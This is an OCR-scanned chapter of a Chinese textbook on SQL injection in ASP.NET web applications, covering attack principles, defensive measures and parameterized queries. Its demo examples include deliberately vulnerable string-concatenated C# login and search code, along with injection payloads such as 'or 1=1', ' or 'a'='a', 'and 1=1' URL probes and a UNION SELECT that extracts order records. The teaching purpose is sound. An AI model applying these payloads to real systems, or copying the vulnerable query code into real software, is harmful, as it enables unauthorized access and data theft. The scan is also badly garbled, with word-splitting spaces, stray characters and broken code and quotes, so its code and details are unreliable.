(3) 攻击 者 在 用 户 名 和 密码 输入 框 中 输入 “or 1=1” 之 类 的 内 容 。 

(4) 用 户 输入 的 内 容 提 交 给 服务 器 后 ， 在 服务 器 运行 上 面 的 ASP.NET 代码 构造 查询 
用 户 的 SQL 命令 ， 由 于 攻击 者 输入 的 内 容 非常 特殊 。 就 使 SQL 命令 变 成 类 如 : 


SELECT from Users WHERE login=or 1=1 AND password=or 1=1 


(5) 服务 器 执行 查询 或 存储 过 程 ， 将 用 户 输入 的 身份 信息 和 服务 器 中 保存 的 身份 信息 
进行 对 比 。 

(6) 由 于 SQL 命令 已 被 注入 式 攻 击 修改 , 不 能 有 效 验证 用 户 身 份 ， 所 以 系统 错误 地 授 
权 给 了 攻击 者 。 如 果 攻 击 者 知道 将 表单 中 输入 的 内 容 直 接 可 以 用 于 验证 身份 的 查询 ， 将 会 
尝试 输入 某 些 特殊 的 SQL 字符 串 , 算 改 查询 原来 的 功能 ,欺骗 系统 的 授予 访问 权限 ,进而 
可 能 对 数据 表 执 行 各 种 操作 ， 包 括 添 加 、 删 除 或 更 新 数据 ， 甚 至 可 能 删除 表 。 





5.1.2 ”攻击 方式 


从 攻击 原理 可 以 看 出 ，SQL 注入 攻击 的 源头 是 用 户 输入 到 Web 表单 的 输入 域 或 页 面 
请 求 的 查询 字符 串 的 内 容 ， 沿 着 SQL 命令 路 径 可 以 到 达 数 据 库 服务 器 。 在 攻击 的 过 程 中 ， 
根据 用 户 操 作 可 将 攻击 方式 分 为 无 意 攻击 和 有 意 攻击 。 

无 意 攻击 是 指 用 户 无 意 中 在 Web 表单 的 输入 域 或 页 面 请 求 的 查询 字符 串 输入 一 些 字 
符 构 成 SQL 命令 ,这些 命 令 会 对 数据 库 执行 破坏 操作 ， 此 攻击 造成 的 危害 较 小 。 有意 攻 击 
指 用 户 故 意 在 Web 表单 的 输入 域 或 页 面 请 求 的 查询 字符 串 输 入 一 些 字符 构成 SQL 命令 ， 
通过 这 些 命令 欺骗 服务 器 操作 数据 库 得 到 某 些 返回 结果 ， 此 攻击 造成 的 危害 非常 严重 。 

实际 上 , 每 个 Web 站 点 都 读 取 用 户 的 信息 ， 从 登录 信息 到 查找 条 件 等 。 当 用 户 在 数据 
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库 将 要 处 理 的 数据 时 故意 插入 SQL 代码 ， 就 发 生 了 SQL 注入 。 此 外 一 些 基 本 的 SQL 符号 
将 有 助 解 释 这 些 攻击 , 称 为 SQL 特殊 符号 攻击 。 常见 如 “” 打 开 和 关闭 数据 库 字 符 串 ;“; ” 
结束 语句 ，“ 一 ”创建 注释 ， 编 译 器 会 忽略 “一 ”之 后 的 内 容 ， 还 有 如 “/”、“%” 等 转 
义 符号 。 


5.1.3 ”防范 方法 


从 以 上 SQL 注入 攻击 的 源头 , 路 径 以 及 攻击 方式 的 分 析 , 可 以 针对 性 地 采取 如 下 的 防 


范 措施 : 
1.， 过 滤 或 转 义 危险 字符 


过 滤 或 转 义 危险 字符 是 阻止 SQL 注入 最 常用 也 最 简单 的 方法 。 这 种 技术 的 思想 基础 
是 , 从 用 户 输入 中 移 除 (过 滤 ) 危险 字符 , 或 使 数据 库 将 危险 字符 作为 文字 对 待 ( 即 转 义 ) 。 
过 滤 并 不 是 一 种 理想 的 构思 ， 因 为 “危险 的 ”字符 可 能 是 用 户 输入 的 有 效 部 分 。 但 是 ， 可 
以 在 出 现 “ 已 知 有 害 ” 数 据 的 地 方 引 发 错误 。 已 知 的 有 害 数 据 是 一 般 在 SQL 语句 外 不 可 能 
使 用 的 字符 ， 如 “-” 或 “; ”字符 。 转 义 字 符 一 般 涉 及 复制 危险 字符 ， 所 以 在 “” 字 符 的 
例子 中 ， 代 码 将 字符 视 为 文字 ， 而 不 是 字符 串 的 结束 。 

2. 使 用 SqlParameter 类 


.NET 框架 有 一 个 叫做 SqlParameter 的 集合 类 型 ,可 以 提供 类 型 和 长 度 检查 ,并 且 自 动 
转 义 用 户 输入 。 当 调用 存储 过 程 时 使 用 同样 的 技术 时 ， 数 据 库 将 赋值 给 parm.Value 的 输入 
看 做 文字 值 ， 所 以 不 需要 转 义 用 户 输入 ，SqlParameter 也 强制 要 求 类 型 和 类 型 长 度 。 如 果 
用 户 输入 值 与 描述 的 类 型 和 大 小 不 一 致 ， 代 码 将 抛 出 一 个 异常 。 必 须 尽 可 能 通过 强制 的 类 
型 和 长 度 检 查 限 制 用 户 输入 数据 。 

3. 用 正则 表达 式 限制 输 人 


如 果 ASPNET 的 文本 控件 捕获 了 文本 框 的 值 ， 则 可 以 用 一 个 正则 表达 式 控件 来 限制 
其 输入 。 如 果 文 本 输入 框 的 值 有 另外 的 来 源 ， 如 一 个 HTML 控件 、 查 询 参数 或 Cookie， 则 
可 以 从 System.Text.RegularExpressions 命名 空间 中 用 类 Regex 来 限制 输入 。 


4. 使 用 最 小 权限 


将 数据 库 访 问 和 数据 库 使 用 权限 限制 到 功能 性 的 最 小 权限 集 。 如 果 应 用 程序 仅 需 要 从 
数据 库 中 读 取 数 据 ， 就 没有 理由 允许 数据 库 用 户 拥 有 删除 表 、 插 入 记录 或 除 读 取 数据 之 外 
的 其 他 任何 权限 。 

如 果 有 恶意 代码 对 数据 库 实 施 SQL 注入 攻击 ,但 由 于 缺乏 权限 ,破坏 将 降 到 最 低 限度 。 

5. 拒绝 已 知 的 攻击 签名 

根据 应 用 程序 的 行为 , 可 以 拒绝 访问 可 能 有 人 危险 的 数据 。 过滤 危险 的 SQL 命令 的 关键 
字 ， 如 drop、delete、insert 或 update 等 。 
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6. 加 密 处 理 


将 用 户 登 录 名 称 ， 密 码 等 数据 加 密 后 保存 于 数据 库 。 加 密 用 户 输入 的 数据 ， 然 后 再 将 
它 与 数据 库 中 保存 的 数据 比较 ， 这 就 对 用 户 输入 的 数据 进行 了 “清洁 处 理 ”， 用 户 输入 的 
数据 不 再 对 数据 库 有 任何 特殊 的 意义 ， 从 而 防止 了 注入 SQL 攻击 命令 。 在 System.web. 
Security.FormsAuthenatication 类 有 一 个 HashPasswordForStoringmConfigFile, 适合 对 输入 数 
据 进行 处 理 。 
7. 在 服务 器 上 处 理 错误 


系统 错误 中 可 以 给 攻击 者 提供 数据 库 中 的 许多 详细 信息 ， 如 果 在 Try 和 Catch 语句 中 
隐藏 数据 库 行 为 ， 并 在 服务 器 端正 确 地 处 理 错误 ， 则 可 以 避免 攻击 者 收集 信息 。 在 Catch 
语句 中 记录 发 生 的 错误 的 详细 信息 将 有 助 于 得 知 受到 的 攻击 ， 以 及 攻击 的 企图 。 通 过 在 服 
务 器 上 处 理 错 误 , 将 阻止 服务 器 向 客户 传送 错误 , 以 及 所 包含 的 敏感 信息 , 因为 成 功 的 SQL 
注入 攻击 不 一 定 会 导致 错误 ， 导 致 错误 的 SQL 注入 通常 说 明 攻击 者 正在 收集 数据 库 信息 ， 
是 攻击 的 前 兆 。 





5.2 一 个 注入 实例 


本 节 主 要 讲述 如 何 通 过 编写 严密 的 代码 来 防止 注入 攻击 的 发 生 。 下 面 通过 一 个 
ASPNET 实际 攻防 注入 攻击 的 例子 讲解 编程 的 方法 。 此 法 不 仅 适合 ASPNET， 同 时 适用 
于 JSP、PHP 等 Web 技术 。 


1. 第 1 个 演示 实例 


演示 实例 1 是 一 个 登录 窗 体 ， 用 户 输入 账户 密码 后 登录 系统 。 在 登录 界面 ， 用 户 输入 
账户 和 密码 后 接受 系统 的 权限 认证 ， 黑 客 可 以 通过 巧妙 的 SQL 语言 欺骗 后 进入 。 

映射 到 代码 中 ， 黑 客 需 要 利用 账户 名 输入 框 txtUsemame 和 密码 输入 框 txtPassword 输 
入 注入 语句 。 

登录 界面 的 HTML 代码 如 下 : 


<%@ Page Language="C#" AutoEgventWireup="true" CodeFile="Login.aspx.cs" 
Inherits="OASystem.Web.Login" $%> 
<!DOCTYPE HTML PUBLIC "-// W3C// DTD HTML 4.0 Transitional// EN"> 
<html> 
<head> 
<title>: : : :企业 协同 办 公平 台 V0.9 ::::</title> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312”> 
<link href="Css/Login.css" type="text/css" rel="stylesheet"> 
<script language="JavaScript" type="text/JavaScript"> 
<meta content="MSHTML 6.00.2900.3086" name="GENERATOR"> 
</head> 
<body scroll="no"> 
<div align="center"> 
<form id="Forml" method="post" runat="server"> 
<table height="100%" width="100%" border="0"><tr> 
<td class="biao" valign="middle" align="center" height="489"> 
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<table width="591"” height="390" border="0" align="center" 
cellpadding="0" 
cellspacing="0"> <tr> 
<td height="390" align="]left" valign="top"> 
<table width="100%" border="0" cellspacing="0" cellpadding="0"> 
<tr> <td> 
<img src="images/LogIn/top.gif" width="591" height="22"></td></tr> 
</table> 
<table width="100%" border="0" cellspacing="0" cellpadding= 
<tr><td height="219" align="left" valign="top" background: 
LogIn/bgl .gif"> 
<table width="100%" border= 
<tr> 
<td height="90"> </td> 
</tr> </table> 
<table width="100%" border="0" cellspacing= 
<tr><td height="40"> 
&nbsp; </td> </tr> 
</table> <table width="100%" border= 
je 二 号 
<td height="35" align="right" valign="middle" style="width: 
98px"> 
<img src="images/LogIn/nl1.gif" width="53" height="16"></td> 
<td width="62%" height="35" align="left" valign="middle"> 
&nbsp; 
<asp:TextBox ID="txtUsername" runat="server" CssClass="111" 
Width="195px"></asp:TextBox><asp:RequiredFieldValidator 
ID="RequiredFieldValidatorl" runat="server" ControlToValidate= 
"txtUsername" 
ErrorMessage="*"></asp:RequiredFieldValidator> 
</td></tr> <tr> 
<td height="35" align="right" valign="middle" style="width:98px"> 
<img src="images/LogIn/n2.gif" width="53" height="16"></td> 
<td height="35" align="left" valign="middle">gnbsp; 
<asp:TextBox ID="txtPassword" runat="server" CssClass="111" TextMode= 
"Password" Width="195px"></asp:TextBox><asp:RequiredFieldValidator 
ID="RequiredFieldValidator2" runat="server" ControlToValidate= 
"txtPassword" ErrorMessage="*"></asp:RequiredFieldValidator> </td></ 
Er tr 
<td align="right" valign="middle" style="width:98px; height:40px; 
font-weight:bold; 
font-size:14px"> 
<img src="images/LogIn/n3.gif" width="53" height="16"></td> 
<td align="left" valign="middle" style="height:40px"> 
<asp:DropDownList ID="drpEnterprise" CssClass="]111" runat="server" 
Width="200px"> 
</asp:DropDownList> </td> </tr></table> 
<table width="100%" height="50" border="0" cellpadding="0" cellspacing= 
"On> 
<tr><td width="23%">gnbsp;</td> 
<td width="77%" align="left" valign="middle"> 
<table width="214" border="0" cellspacing="0" cellpadding="0"> 
<tr><td> 
<asp:ImageButton ID="ImageButtonl" runat="server" ImageUrl="~/images 
/LogIn/ml .gif™ 
Width="90" Height="26" OnClick="ImageButtonl Click" /> </td><td> 
<asp:ImageButton ID="ImageButton2" runat="server" ImageUrl="~/images/ 
LogIn/m2.gif™ 
Width="90" Height="26" CausesValidation="false" /> 
</td></tr> </table> </td> </tr> </table> 
<asp:Label ID="lblErrorMessage" runat="server" Font-Size="X-Small™" 






n> 
images/ 





0" cellspacing="0" cellpadding="0"> 








cellpadding=" 





" cellspacing="0" cellpadding= 
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ForeColor="Red" 
Visible="False" Width="164px"> 错 误 的 用 户 名 和 密码 </asp:Labe1></td> 
<td width="271"” height="346"> 
</td> </tr> </table> 
<table width="100%" height="22" border="0" cellpadding="0" cells-— 
pacing="0" background="images/LogIn/foot.gif"> 
<tr> <td align="center" valign="middle"> 
<span class="STYLE3">Copyright 2001-2008 @ Company. All rights reserved. 
</span></td></tr> 
</table> </td></tr> </table><p> 
</table> 
</form> 
</div> 
</body> 
</html> 





上 述 代码 是 测试 页 面 的 主体 部 分 。 单 击 登录 按钮 ImageButtonl 时 进行 登录 验证 ,执行 
的 数据 库 匹 配 检索 的 SQL 语句 应 该 如 下 : 


cmd.CommandText= "SELECT 下 FROM [test]. [dbo]. [user] where 
[user]='"+username+"' and [pswd]='"+pswd+""'"; 


接着 打开 该 界面 的 后 端 代码 文件 ， 输 入 如 下 的 C# 代 码 创 建 一 个 简单 的 登录 验证 功能 。 
代码 中 包含 一 个 登录 按钮 单 击 事件 Buttonl_Click， 它 执行 检索 账户 的 SQL 语句 ， 假 如 正 
确 则 提示 欢迎 信息 。 

后 台 代 码 如 下 : 


public partial class Default :System.Web.UI.Page 
{ 





string username; // 存储 用 户 输入 的 用 户 名 
string pswd; // 存储 用 户 输入 的 密码 
SqlConnection conn; // SqlConnection 实例 
SqlCommand cmd; // SqlCommand 实例 
protected void Page Load(object sender, EventArgs e) 

. 


conn = new SqlConnection(); 
conn .ConnectionString = SqlDataSourcel .Connectionstring; 


conn.Open () // 打开 数据 库 连 接 


cmd = new SqlCommand () 7 
cmd.Connection = conn; 


cmd.CommandType = CommandType.Text; 


} 
protected void Buttonl1 Click(object sender, EventArgs e) 
{ 
username = tusername.Text; // 获取 用 户 输入 的 用 户 名 


pswd = tpassword.Text; // 获取 用 户 输入 的 密码 
cmd.CommandText = "SELECT * FROM [test].[dbo].[user] where [user]= 
'"+usernamet+"' and 


[pswd]="'"+pswd+"'"; // 查询 字符 串 


if( cmd.ExecuteScalar() !'=null) 


Response.Redirect ("Welcom.aspx"); // 如 果 用 户 名 密码 正确 , 跳 转 到 欢迎 界面 


else 


TextBox1.Text = "用 户 名 或 密码 错误 "; // 错误 ,显示 错误 信息 
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上 述 创建 完成 了 一 个 简单 的 登录 功能 。 当 用 户 输入 正常 的 用 户 名 和 密码 后 ， 系 统 提 示 
欢迎 界面 。 接 着 就 需要 进行 宇 探 式 的 注入 攻击 了 。 
正常 情况 下 ， 这 种 登录 验证 看 起 来 没什么 问题 ， 下 面 是 单 击 登 录 按钮 时 的 查询 语句 : 
cmd.CommandText="SELECT * FROM [test]. [dbo]. [user] where [user]=" yangyun'"' 
and [pswd]="123456'" 
被 验证 的 变量 都 在 两 个 单 引 号 中 间 ，and 语句 要 求 前 后 都 为 真 结果 才 为 真 ， 但 是 可 以 
想到 如 果 是 or 语句 的 话 , 那么 只 有 结果 只 要 有 一 个 为 真 的 话 , 那么 整个 语句 就 可 顺利 进行 。 
如 果 查 询 语句 是 这 样 的 话 : 


cmd.CommandText="SELECT * FROM [test]. [dbo]. [user] where [user]=" yangyun'" 
and [pswd]='123456"' or ‘a’=’a’™" 

















显然 “a” =” a’” 肯定 为 真 , 那么 就 意味 着 “where [user]='yangyun' and [pswd]='123456'or 
“a”=”a”” 为 真 ， 如 果 这 样 的 话 ， 无 论 输 入 任何 的 用 户 名 密码 都 可 以 通过 验证 。 

到 此 , 读者 只 需要 按照 上 述 步骤 将 SQL 语句 填写 到 用 户 名 或 密码 中 ,登录 界面 都 将 错 
误 的 验证 通过 。 

此 类 漏洞 能 够 注入 成 功 的 原因 : 变量 的 值 在 两 个 单 引 号 中 间 ， a a 
必须 使 语句 在 单 引 号 之 外 。 假 如 黑客 输入 密码 aa 之 后 加 了 单 引 号 ， 这 样 [pswd]=" 的 第 
一 个 单 引号 和 aa 后 的 单 引 号 闭合 ,使 得 后 面 的 语句 可 以 执行 ， dt -个 单 引号 ,此 
时 黑客 用 后 一 个 ”a 前 面 的 单 引 号 和 它 闭合 。 这 样 语句 变 成 了 where [user]='yangyun' and 
[pswd]='aa' or “a” =”a”。 问 题 的 根源 在 于 没有 对 输入 做 过 滤 ， 用 户 输入 的 单 引号 闭合 
了 原来 的 单 引号 。 关 于 输入 过 滤 技 术 请 读者 参考 本 书 第 5 章 。 


2. 第 2 个 演示 实例 


查询 字符 串 是 跨 页 传递 在 ASP 页 面 的 最 简单 的 做 法 。 这 种 做 法 在 ASP.NET 2.0 以 上 版 
本 已 经 不 是 推荐 的 做 法 了 ， 但 对 于 简单 数据 传输 还 算 简 单 而 便利 。 该 实例 就 通过 查询 字符 
串 进一步 讲解 SQL 的 注入 攻击 。 
1) 实例 参数 说 明 
pagel: 传递 参数 。 
Page2: 接收 并 处 理 参数 。 
2) 相关 代码 
pagel 传递 参数 的 代码 : 


protected void Button1l Clickl (object sender, EventArgs e) 
Response.Redirect ("page2.aspx?name="+textbox name.Text.Tostring 
()+ "gpassword="+textbox password.Text.Tostring()); 


} 
page2 接收 并 处 理 的 相关 代码 : 


Username .Text = Request.QueryString["name"] .ToString(); 
tpassword.Text = Request.QueryString["password"] .ToString(); 
username = tusername.Text; 
pswd = tpassword.Text; 
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cmd.CommandText = "SELECT * FROM [test].[dbo].[user] where [user]= 
"+ Username + "" and 
[pswd]="™ + pswd + ™"'"s 
if (cmd.ExecuteScalar() != null) 
Response.Write ("hao"); 
// Response.Redirect ("Welcom.aspx"); 
else 


TextBox1 .Text = "用 户 名 或 密码 错误 "; 


读者 复制 上 述 代 码 运 行 后 ， 会 发 现 传递 的 参数 会 在 浏览 器 地 址 栏 显示 如 下 : 
http:// localhost:1239/WebSite/page2.aspx?name=xuanhungpassword=123456 


根据 这 个 形式 的 地 址 ， 黑 客 就 可 以 利用 注入 漏洞 倾 入 Web 系统 。 在 接 下 来 的 3) 讲 的 
就 是 根据 这 个 地 址 形式 攻击 的 原理 和 防范 策略 。 

3) 原理 和 防范 策略 

跨 页 面 参数 的 传递 有 几 种 类 型 ， 主 要 包括 数字 型 、 字 符 型 和 搜索 型 。 

(1) 数字 型 。 

查询 语句 类 似 为 :Select * from 表 名 where 字段 =23。 因 为 数字 型 没有 引号 ， 直 接 加 
查询 语句 测试 是 否 可 以 执行 。 查 询 语句 为 : 

GD http:// localhost:1239/WebSite/page2.aspx?id=23。 查 询 语句 为 : 


Select * from 表 名 where 字段 =23 


@) http:// localhost:1239/WebSite/page2.aspx?id=23 and 1=1。 因 为 and 1=1 为 真 ， 所 以 
如 果 返 回 的 页 面 和 @ 同 ， 说 明 我 们 插入 的 语句 执行 了 。 查 询 语句 为 


Select * from 表 名 where 字段 =23 and 1=1 





(8) http:// localhost:1239/WebSite/page2.aspx?id=23 and 1=2。 因 为 and 1=2 为 假 ， 查 询 
语句 为 : 


Select * from 表 名 where 字段 =23 and 1=2 


这 就 是 典型 的 1=1、1=2 测试 法 的 原理 ， 可 以 注入 的 表现 为 : 
正常 显示 〈 这 是 必然 的 ， 不 然 就 是 程序 有 错误 了 ) ; 
正常 显示 ， 内 容 与 相同 ， 系 统 得 到 记录 状态 BOF 或 EOF (程序 没 做 任何 判断 时 )、 
或 提示 找 不 到 记录 (判断 了 rs.eof 时 )、 或 显示 内 容 为 空 (程序 加 了 on error resume next)。 
不 可 以 注入 就 比较 容易 判断 了 ，Q@ 同 样 正常 显示 ，@@ 和 @ 一 般 都 会 有 程序 定义 的 错误 
提示 ， 或 提示 类 型 转换 时 出 错 。 
(2) 字符 型 。 
查询 语句 类 似 为 : 


Select * from 表 名 where 字段 ='yangyun' 


这 种 测试 不 过 是 先 屏蔽 单 引 号 再 用 上 面 的 方法 来 检测 漏洞 。 例 如 ， 前 面 提 到 的 测试 





http:// localhost:1239/WebSite/page2.aspx?name=xuanhungpassword=123456 
查询 语句 为 : 
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Select * from [user] where [name]= 'yangyun'and [pswd]= '123456'。 


字符 型 可 以 直接 在 单 引号 看 程序 的 错误 信息 ， 如 : 

http:// localhost:1239/WebSite/page2.aspx?name=xuanhung&password="'123456" 
返回 错误 信息 : /WebSite 应 用 程序 中 的 服务 器 错误 。 

字符 串 '123456' 后 的 引号 不 完整 。'123456' 附 近 有 语法 错误 。 

再 屏蔽 单 引 号 后 ， 页 面 正 常 显示 结果 : 


http://localhost:1239/WebSite/page2.aspx?name=xuanhungpassword=123456" 
and ‘a'='a' 


(3) 搜索 型 。 

查询 语句 类 似 为 :Select * from 表 名 where 字段 like ”% 关 键 字 %" 。 要 屏蔽 单 引号 
和 百 分 号 再 用 上 面 的 方法 测试 ， 注 入 也 是 一 样 。 

例如 : select * from [user] where [username] like “%a%”and 1=1 


原理 和 其 他 2 种 基本 相同 ， 这 里 就 不 详细 介绍 了 。 
3. 第 3 个 演示 实例 





这 个 实例 用 的 Web 应 用 程序 包含 一 个 名 为 SQLInjection.aspx 简单 的 客户 搜索 页 面 , 这 
个 页 面 易 于 受到 SQL 注入 攻击 。 此 页 面包 含 一 个 CompanyName 的 输入 服务 器 控件 ， 还 有 
一 个 数据 表格 控件 ， 用 于 显示 从 微软 公司 的 示例 数据 库 Northwind 的 搜索 结果 (这 个 数据 
库 可 从 SQL Server 2005 中 找到 )。 在 搜索 期 间 执行 的 查询 包含 一 个 应 用 程序 设计 中 很 普通 
的 错误 : 动态 地 从 用 户 提供 的 输入 中 生成 查询 。 这 是 Web 应 用 程序 数据 访问 中 的 一 个 主要 
的 错误 ， 因 为 这 样 实际 上 潜在 地 相信 了 用 户 输入 ， 并 直接 将 其 发 送 给 服务 器 。 在 从 “搜索 ” 
的 单 击 事件 启动 时 ， 这 个 查询 演示 代码 如 下 : 

protected void btnSearch Click(object sender,EventArgs e) 

tg cmd = "SELECT [CustomerID], [CompanyName], [ContactName] 

FROM [Customers] WHERE CompanyName ="'" + txtCompanyName.Text 

De = cmd; 

GridView1.Visible = true; 


| 





在 这 种 情况 下 ， 如 果 一 个 用 户 输入 Emst Handel 作为 公司 名 ， 并 单 击 “ 搜 索 ” 按 钮 ， 
作为 响应 屏幕 会 向 用 户 显示 那个 公司 的 记录 ， 这 正 是 所 期 望 的 理想 情况 。 不 过 一 个 攻击 者 
可 以 轻易 地 操纵 这 个 动态 查询 。 例 如 ， 攻 击 者 通过 插入 一 个 UNION 子 句 ， 并 用 一 个 注释 
符号 终止 这 个 语句 的 剩余 部 分 。 换 句 话 说， 攻击 者 不 是 输入 Emst Handel， 而 是 输入 如 下 
的 内 容 : 


Ernst Handel' UNION SELECT CustomerID, ShipName, ShipAddress 
FROM ORDERS—— 


其 结果 是 , SQL 语句 在 服务 器 端 执 行 , 由 于 添加 了 恶意 的 请 求 , 它 会 将 这 个 动态 的 SQL 
查询 转换 如 下 : 


SELECT [CustomerID], [CompanyName], 
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[ContactName] 

FROM [Customers] 

WHERE CompanyName ="Ernst Handel' 

UNION SELECT CustomerID,ShipName, 

ShipAddress 

FROM ORDERS-—" 

这 是 一 个 合法 的 SQL 语句 ， 可 以 在 应 用 程序 数据 库 上 执行 ， 返 回 order 表 中 所 有 的 客 
户 。 这 些 客户 通过 应 用 程序 已 经 处 理 了 定单 。 


5.3 加固 SQL 参数 与 存储 过 程 


开发 人 员 对 于 注入 攻击 可 能 有 了 一 些 了 解 ， 但 是 实际 运用 中 却 很 难 通过 把 握 一 些 如 
环节 和 技术 对 注入 攻击 进行 防范 。 

本 节 为 读者 讲解 如 何 利用 ADO.NET 本 身 的 参数 对 象 和 存储 过 程 技术 防止 注入 攻击 ， 
以 达到 用 户 界面 输入 与 原始 SQL 的 分 离 ， 使 黑客 无 法 拼接 SQL 语句 的 目的 。 


1. SQL 参数 与 存储 过 程 


SQL 参数 是 开发 人 员 很 容易 忽视 的 一 个 环节 ， 通 常 直 接 完成 SQL 语句 ， 然 后 传递 给 
数据 库 执行 。 这样 的 写法 固然 简单 , 但 是 也 为 注入 攻击 埋 下 了 伏笔 。 如 果 要 避免 注入 攻击 ， 
就 要 对 SQL 语句 进行 专门 的 过 滤 处 理 ， 但 如 果 直 接 使 用 SQL 参数 对 象 就 可 以 省 去 以 上 
环节 。 

SQL 中 的 Parameters 集合 提供 了 类 型 检查 和 长 度 验证 。 如 果 研 发 人 员 使 用 Parameters 
集合 ， 输 入 将 被 视 为 文本 值 进行 处 理 ，SQL 不 会 将 它 视 为 可 执行 代码 。 使 用 Parameters 集 
合 的 另 一 个 好 处 是 可 以 实施 类 型 和 长 度 检查 ， 如 果 值 超出 范围 将 触发 异常 。 这 是 纵深 防范 
的 一 个 好 例子 。 尽 可 能 地 使 用 存储 过 程 ， 而 且 应 该 通过 Parameters 集合 调用 它们 。 

下 面 通过 几 行 代码 说 明 如 何 使 用 参数 集合 对 象 , 读者 注意 @au_id 参数 将 被 当 作文 本 值 
而 不 是 可 执行 代码 。 同 样 ， 对 参数 将 进行 类 型 和 长 度 检查 。 在 下 面 的 示例 中 ， 输 入 值 不 能 
长 于 11 个 字符 。 如 果 数 据 不 遵守 参数 所 定义 的 类 型 或 者 长 度 ， 将 出 现 异 常 。 

Parameters 集合 演示 代码 如 下 : 


SqlDataAdapter myCommand = new SqlDataAdapter ("AuthorLogin",conn); 
myCommand.SelectCommand.CommandType = CommandType.StoredProcedure; 
SqlParameter parm = myCommand.SelectCommand.Parameters.Add( 

"eau id",SqlDbType.VarChar,11); 
parm.Value = Login.Text; 


请 读者 注意 , 使 用 存储 过 程 并 不 一 定 能 防止 SQL 注入 。 重 要 的 是 在 存储 过 程 中 使 用 参 
数 对 象 。 如 果 不 使 用 参数 , 存储 过 程 使 用 未 经 筛选 的 输入 时 , 就 很 容易 遭 到 SQL 注入 攻击 。 
例如 ， 以 下 代码 片段 就 存在 问题 : 


SqlDataAdapter myCommand = new SqlDataAdapter ("LoginStoredProcedure "" 十 
Login.Text + ""™", conn}); 


二 
站 








正确 的 代码 片段 如 下 所 示 : 


SqlDataAdapter myCommand = new SqlDataAdapter!( 
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"SELECT au lname, au fname FROM Authors WHERE au id = @au id",conn); 

SqlParameter parm = myCommand.SelectCommand.Parameters.Add("@au id"， 
SqlDbType.VarChar,11); 

parm.Value = Login.Text; 


5.4 正确 连接 数据 库 


无 论 是 SQL Server 数据 库 或 Oracle 数据 库 ， 都 有 自己 的 安全 连接 机 制 。 但 往往 由 于 
Web 系统 的 脆弱 ， 导 致 数据 库 的 安全 发 发 可 和 危 。 

以 SQL Server 为 例 ， 该 数据 库 安 装 有 两 个 关于 安全 模式 的 选项 。 它 们 之 间 的 差别 在 于 
由 哪 一 个 软件 执行 认证 过 程 。 认 证 是 确认 将 要 连接 SQL Server 的 用 户 身份 的 过 程 。 一 旦 执 
行 了 认证 ，SQL Server 就 能 验证 用 户 是 否 具有 许可 来 连接 一 个 被 请 求 的 资源 ， 例 如 一 个 数 
据 库 。 如 果 用 户 具 有 连接 数据 库 的 许可 ， 那 么 SQL Server 将 允许 连接 请 求 成 功 ， 否 则 ， 连 
接 失 败 。 这 个 验证 用 户 许可 的 过 程 还 被 称 为 授权 。 

Windows Authentication( 也 称 为 Windows 集 成 验证 ) 使 用 进行 连接 请 求 过 程 的 Windows 
用 户 身份 来 执行 对 数据 库 连 接 的 授权 。 在 这 种 情况 下， 连接 字符 串 不 必 提 供 显 式 的 用 户 名 
和 密码 。ASPNET 以 一 个 名 为 ASPNET 的 本 地 用 户 来 运行 或 者 在 HS 6.0 中 使 用 用 户 名 
Network Service)， 所 以 当 使 用 Windows Authentication 时 ，SQL 将 会 检查 这 个 用 户 是 否 拥 
有 使 用 数据 库 的 许可 。 

此 时 , 所 有 的 ASPNET 应 用 程序 都 用 这 个 相同 的 用 户 运行 , 所 以 该 安全 模式 对 这 些 应 
用 程序 一 视 同仁 。 虽然 可 以 在 单独 的 ASPNET 进程 中 运行 每 一 个 应 用 程序 (单独 的 用 户 运 
行 每 个 程序 )， 或 者 可 以 模拟 进行 连接 请 求 的 浏览 器 客户 的 Windows 用 户 身份 ， 但 是 这 些 
内 容 都 超出 了 本 书 所 要 讲述 的 范围 。 不 过 ， 客 户 模 拟 的 情况 在 Web 应 用 程序 中 是 
WindowsAuthentication 最 常见 的 使 用 方式 。 

SQL Authentication 针对 在 SQL Server 内 配置 的 用 户 检查 显 式 提供 的 用 户 名 和 密码 (无 
需 涉 及 操作 系统 )。 在 这 种 情况 下 ， 在 ASPNET 进程 中 运行 的 每 个 应 用 程序 都 能 以 单独 的 
证 书 连接 数据 库 ， 这 样 就 把 应 用 程序 合理 地 隔离 开 了 应 用 程序 A 如 果 没 有 B 的 用 户 名 和 
密码 就 不 能 连接 至 B 的 数据 库 )。 这 是 用 于 Web 应 用 程序 部 署 的 最 常见 认证 模式 ， 特 别 是 
在 共享 宿主 的 情况 下 。 这 种 方式 的 一 个 缺点 就 是 需要 应 用 程序 保留 用 于 连接 的 用 户 账户 的 
密码 ， 并 且 如 果 该 密码 被 恶意 用 户 获取 ， 那 么 将 危及 数据 库 的 安全 。 但 是 ， 在 本 书后 面 将 
会 看 到 ，ASPNET 提供 了 一 个 安全 的 方式 ， 将 SQL Authentication 密码 以 加 密 的 格式 保存 
在 Web.config 文件 中 ， 这 样 就 降低 了 密码 被 获取 的 风险 。 
Mixed Mode 是 SQL Server 的 混合 验证 模式 , 既 人 允许 Windows Authentication 认证 方式 ， 
也 允许 SQL Authentication 认证 方式 。 

在 安装 SQL Server 或 单 指令 多 数据 流 扩展 组 件 (Streaming SIMD Extensions, SSE ) 时 ， 
要 选择 一 种 认证 模式 。 在 SQL Server 中 ， 有 向 导 会 在 安全 步骤 中 帮助 选择 ， 而 在 SSE 中 ， 
默认 选择 是 Windows Authentication。 如 果 要 安装 SQL Authentication， 就 必须 显 式 地 配置 。 
本 文 使 用 的 是 Windows Authentication 。 

如 果 已 经 安装 了 SQL Server 或 SSE， 就 能 通过 打开 RegEdit 来 查看 所 指定 的 认证 模式 
(当然 需要 先 备 份 )， 找 到 HKey Local Machine/Software/Microsoft/Microsoft SQL Server 并 
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搜索 LoginMode。 值 为 1 的 注册 子 键 表 示 Windows Authentication， 而 值 2 表示 Mixed 
Authentication 模式 。 

上 述 几 种 安全 连接 模式 如 果 要 结合 Web 开发 技术 , 则 可 以 进一步 加 固 应 用 程序 与 数据 
库 之 间 的 通信 连接 。 表 5-1 所 示 为 以 ASPNET 为 例 罗 列 各 类 授权 和 连接 之 间 的 差别 。 


表 5-1 各 类 授权 和 连接 之 间 的 差别 


















连接 类 型 Windows 验证 SQL 验证 
. ， |Tmsted Authentication 没有 ， 但 是 Mixed Mode Authen tication 
名 称 Trusted Authenticat 
te ttton Integrated Security 允许 使 用 Windows 或 SQL Authentication 
典型 环境 内 部 网 SQL Server 
ASPNET Web 应 用 程序 的 用 户 
